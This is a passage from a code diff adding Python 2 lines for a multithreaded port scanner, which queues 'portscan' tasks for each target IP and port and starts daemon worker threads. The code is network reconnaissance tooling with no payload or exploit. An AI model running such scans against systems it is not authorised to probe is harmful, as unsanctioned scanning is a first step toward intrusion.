+ if ping:ip_list = get_ac_ip(ip_list)
+ port_list = port.split(',')
+ for ip_str in ip_list:
+ for port_int in port_list:
+ I+=1
+ queue.put(':'.join(['portscan',ip_str,port_int]))
+ for i in range(m_count):
+ t = ThreadNum(queue)
+ t.setDaemon(True)
+ t.start()
+ t_join(m_count)
+ except Exception,e:
+ print msg
